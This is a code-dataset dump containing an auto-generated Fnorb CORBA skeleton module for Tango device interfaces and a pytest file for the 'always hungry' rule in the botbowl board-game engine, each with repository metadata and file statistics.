2020-10-28T16:57:36.000Z
|
2020-10-28T16:57:36.000Z
|
src/hapPyTango/Tango_skel/__init__.py
|
mguijarr/hapPyTango
|
2506c8e83d93fbd2c0a0115983489d59c74caa2f
|
[
"MIT"
] | null | null | null |
src/hapPyTango/Tango_skel/__init__.py
|
mguijarr/hapPyTango
|
2506c8e83d93fbd2c0a0115983489d59c74caa2f
|
[
"MIT"
] | null | null | null |
""" Module: IDL:Tango:1.0
Automagically generated by:-
The ORB called Fnorb v1.1.Return.of.Fnorb
"""
_FNORB_ID = "IDL:Tango:1.0"
# Fnorb modules.
import Fnorb.orb.CORBA
import Fnorb.orb.TypeManager
import Fnorb.orb.Util
class Device_skel(Fnorb.orb.CORBA.Object_skel):
""" Interface: IDL:Tango/Device:1.0 """
_FNORB_ID = "IDL:Tango/Device:1.0"
def _skel__get_name(self, server_request):
""" Attribute: IDL:Tango/Device/name:1.0 """
# Typecode for the attribute value.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_string)
# Initialise the server request object.
server_request.initialise([], outputs, [])
# Invoke the implementation.
results = self._get_name()
# Create the reply.
server_request.results(results)
return
def _skel__get_description(self, server_request):
""" Attribute: IDL:Tango/Device/description:1.0 """
# Typecode for the attribute value.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_string)
# Initialise the server request object.
server_request.initialise([], outputs, [])
# Invoke the implementation.
results = self._get_description()
# Create the reply.
server_request.results(results)
return
def _skel__get_state(self, server_request):
""" Attribute: IDL:Tango/Device/state:1.0 """
# Typecode for the attribute value.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevState:1.0"))
# Initialise the server request object.
server_request.initialise([], outputs, [])
# Invoke the implementation.
results = self._get_state()
# Create the reply.
server_request.results(results)
return
def _skel__get_status(self, server_request):
""" Attribute: IDL:Tango/Device/status:1.0 """
# Typecode for the attribute value.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_string)
# Initialise the server request object.
server_request.initialise([], outputs, [])
# Invoke the implementation.
results = self._get_status()
# Create the reply.
server_request.results(results)
return
def _skel__get_adm_name(self, server_request):
""" Attribute: IDL:Tango/Device/adm_name:1.0 """
# Typecode for the attribute value.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_string)
# Initialise the server request object.
server_request.initialise([], outputs, [])
# Invoke the implementation.
results = self._get_adm_name()
# Create the reply.
server_request.results(results)
return
def _skel_command_inout(self, server_request):
""" Operation: IDL:Tango/Device/command_inout:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.command_inout, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_get_attribute_config(self, server_request):
""" Operation: IDL:Tango/Device/get_attribute_config:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.get_attribute_config, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_set_attribute_config(self, server_request):
""" Operation: IDL:Tango/Device/set_attribute_config:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.set_attribute_config, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_read_attributes(self, server_request):
""" Operation: IDL:Tango/Device/read_attributes:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.read_attributes, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_write_attributes(self, server_request):
""" Operation: IDL:Tango/Device/write_attributes:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.write_attributes, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_ping(self, server_request):
""" Operation: IDL:Tango/Device/ping:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# This operation has no arguments.
arguments = ()
# Invoke the implementation.
results = apply(self.ping, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_black_box(self, server_request):
""" Operation: IDL:Tango/Device/black_box:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.black_box, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_info(self, server_request):
""" Operation: IDL:Tango/Device/info:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevInfo:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# This operation has no arguments.
arguments = ()
# Invoke the implementation.
results = apply(self.info, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_list_query(self, server_request):
""" Operation: IDL:Tango/Device/command_list_query:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdInfoList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# This operation has no arguments.
arguments = ()
# Invoke the implementation.
results = apply(self.command_list_query, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_query(self, server_request):
""" Operation: IDL:Tango/Device/command_query:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdInfo:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.command_query, arguments)
# Create the reply.
server_request.results(results)
return
class Device_2_skel(Fnorb.orb.CORBA.Object_skel, Device_skel):
""" Interface: IDL:Tango/Device_2:1.0 """
_FNORB_ID = "IDL:Tango/Device_2:1.0"
def _skel_command_inout_2(self, server_request):
""" Operation: IDL:Tango/Device_2/command_inout_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_any)
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevSource:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.command_inout_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_read_attributes_2(self, server_request):
""" Operation: IDL:Tango/Device_2/read_attributes_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevSource:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.read_attributes_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_get_attribute_config_2(self, server_request):
""" Operation: IDL:Tango/Device_2/get_attribute_config_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList_2:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.get_attribute_config_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_list_query_2(self, server_request):
""" Operation: IDL:Tango/Device_2/command_list_query_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdInfoList_2:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# This operation has no arguments.
arguments = ()
# Invoke the implementation.
results = apply(self.command_list_query_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_query_2(self, server_request):
""" Operation: IDL:Tango/Device_2/command_query_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdInfo_2:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.command_query_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_inout_history_2(self, server_request):
""" Operation: IDL:Tango/Device_2/command_inout_history_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdHistoryList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.command_inout_history_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_read_attribute_history_2(self, server_request):
""" Operation: IDL:Tango/Device_2/read_attribute_history_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevAttrHistoryList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.read_attribute_history_2, arguments)
# Create the reply.
server_request.results(results)
return
class Device_3_skel(Fnorb.orb.CORBA.Object_skel, Device_2_skel):
""" Interface: IDL:Tango/Device_3:1.0 """
_FNORB_ID = "IDL:Tango/Device_3:1.0"
def _skel_read_attributes_3(self, server_request):
""" Operation: IDL:Tango/Device_3/read_attributes_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevSource:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList_3:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.read_attributes_3, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_write_attributes_3(self, server_request):
""" Operation: IDL:Tango/Device_3/write_attributes_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/MultiDevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.write_attributes_3, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_read_attribute_history_3(self, server_request):
""" Operation: IDL:Tango/Device_3/read_attribute_history_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevAttrHistoryList_3:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.read_attribute_history_3, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_info_3(self, server_request):
""" Operation: IDL:Tango/Device_3/info_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevInfo_3:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# This operation has no arguments.
arguments = ()
# Invoke the implementation.
results = apply(self.info_3, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_get_attribute_config_3(self, server_request):
""" Operation: IDL:Tango/Device_3/get_attribute_config_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList_3:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.get_attribute_config_3, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_set_attribute_config_3(self, server_request):
""" Operation: IDL:Tango/Device_3/set_attribute_config_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList_3:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.set_attribute_config_3, arguments)
# Create the reply.
server_request.results(results)
return
class Device_4_skel(Fnorb.orb.CORBA.Object_skel, Device_3_skel):
""" Interface: IDL:Tango/Device_4:1.0 """
_FNORB_ID = "IDL:Tango/Device_4:1.0"
def _skel_read_attribute_history_4(self, server_request):
""" Operation: IDL:Tango/Device_4/read_attribute_history_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevAttrHistory_4:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.read_attribute_history_4, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_inout_history_4(self, server_request):
""" Operation: IDL:Tango/Device_4/command_inout_history_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdHistory_4:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.command_inout_history_4, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_inout_4(self, server_request):
""" Operation: IDL:Tango/Device_4/command_inout_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_any)
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevSource:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/ClntIdent:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.command_inout_4, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_read_attributes_4(self, server_request):
""" Operation: IDL:Tango/Device_4/read_attributes_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevSource:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/ClntIdent:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList_4:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.read_attributes_4, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_write_attributes_4(self, server_request):
""" Operation: IDL:Tango/Device_4/write_attributes_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList_4:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/ClntIdent:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/MultiDevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.write_attributes_4, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_set_attribute_config_4(self, server_request):
""" Operation: IDL:Tango/Device_4/set_attribute_config_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList_3:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/ClntIdent:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.set_attribute_config_4, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_write_read_attributes_4(self, server_request):
""" Operation: IDL:Tango/Device_4/write_read_attributes_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList_4:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/ClntIdent:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList_4:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/MultiDevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.write_read_attributes_4, arguments)
# Create the reply.
server_request.results(results)
return
#############################################################################
| 32.586481
| 87
| 0.645385
| 3,729
| 32,782
| 5.539823
| 0.027085
| 0.103834
| 0.068593
| 0.095653
| 0.975845
| 0.971246
| 0.967325
| 0.946461
| 0.936054
| 0.920757
| 0
| 0.014291
| 0.244372
| 32,782
| 1,005
| 88
| 32.618905
| 0.819668
| 0.310262
| 0
| 0.759615
| 1
| 0
| 0.099044
| 0.097548
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084135
| false
| 0
| 0.007212
| 0
| 0.194712
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6affa7eec73b78ac98cb978c60e126ecc8e0642f
| 2,258
|
py
|
Python
|
tests/game/test_always_hungry.py
|
hadarshavit/botbowl
|
eec77bdda427d5e245de6f5e136e06886183b2c7
|
[
"Apache-2.0"
] | 7
|
2021-11-19T13:17:58.000Z
|
2022-03-23T10:32:13.000Z
|
tests/game/test_always_hungry.py
|
ernestvmo/botbowl
|
8b70faf615fc70eb40aa8b3519a7d2339872ea15
|
[
"Apache-2.0"
] | 32
|
2021-11-19T15:06:55.000Z
|
2022-03-31T16:36:46.000Z
|
tests/game/test_always_hungry.py
|
ernestvmo/botbowl
|
8b70faf615fc70eb40aa8b3519a7d2339872ea15
|
[
"Apache-2.0"
] | 9
|
2021-11-21T16:38:48.000Z
|
2022-03-30T14:12:36.000Z
|
from tests.util import *
import pytest
def test_failed_always_hungry_fail_escape():
game = get_game_turn()
team = game.get_agent_team(game.actor)
game.clear_board()
passer = team.players[0]
passer.role.skills = []
passer.role.ag = 2
passer.extra_skills = [Skill.THROW_TEAM_MATE, Skill.ALWAYS_HUNGRY]
game.put(passer, Square(1, 1))
right_stuff = team.players[1]
right_stuff.role.skills = []
right_stuff.extra_skills = [Skill.RIGHT_STUFF]
right_stuff_position = Square(2, 1)
game.put(right_stuff, right_stuff_position)
game.step(Action(ActionType.START_PASS, player=passer))
D6.fix(1) # Hungry
D6.fix(1) # Escape
game.step(Action(ActionType.PICKUP_TEAM_MATE, player=passer, position=right_stuff.position))
game.step(Action(ActionType.DONT_USE_REROLL))
game.step(Action(ActionType.DONT_USE_REROLL))
assert game.has_report_of_type(OutcomeType.FAILED_ESCAPE_BEING_EATEN)
assert game.has_report_of_type(OutcomeType.EATEN_DURING_ALWAYS_HUNGRY)
assert CasualtyEffect.DEAD in right_stuff.state.injuries_gained
assert not game.has_report_of_type(OutcomeType.TURNOVER)
assert passer.state.used
def test_failed_always_hungry_escaped():
game = get_game_turn()
team = game.get_agent_team(game.actor)
game.clear_board()
passer = team.players[0]
passer.role.skills = []
passer.role.ag = 2
passer.extra_skills = [Skill.THROW_TEAM_MATE, Skill.ALWAYS_HUNGRY]
game.put(passer, Square(1, 1))
right_stuff = team.players[1]
right_stuff.role.skills = []
right_stuff.extra_skills = [Skill.RIGHT_STUFF]
right_stuff_position = Square(2, 1)
game.put(right_stuff, right_stuff_position)
game.step(Action(ActionType.START_PASS, player=passer))
D6.fix(1) # Hungry
D6.fix(2) # Escape
D6.fix(6) # Land
game.step(Action(ActionType.PICKUP_TEAM_MATE, player=passer, position=right_stuff.position))
game.step(Action(ActionType.DONT_USE_REROLL))
assert game.has_report_of_type(OutcomeType.SUCCESSFUL_ESCAPE_BEING_EATEN)
assert game.has_report_of_type(OutcomeType.SUCCESSFUL_LAND)
assert not game.has_report_of_type(OutcomeType.TURNOVER)
assert passer.state.used
assert not right_stuff.state.used
| 39.614035
| 96
| 0.74535
| 325
| 2,258
| 4.895385
| 0.218462
| 0.113136
| 0.061596
| 0.105594
| 0.881835
| 0.850409
| 0.850409
| 0.850409
| 0.837838
| 0.837838
| 0
| 0.012513
| 0.150576
| 2,258
| 56
| 97
| 40.321429
| 0.816997
| 0.014172
| 0
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192308
| 1
| 0.038462
| false
| 0.307692
| 0.038462
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
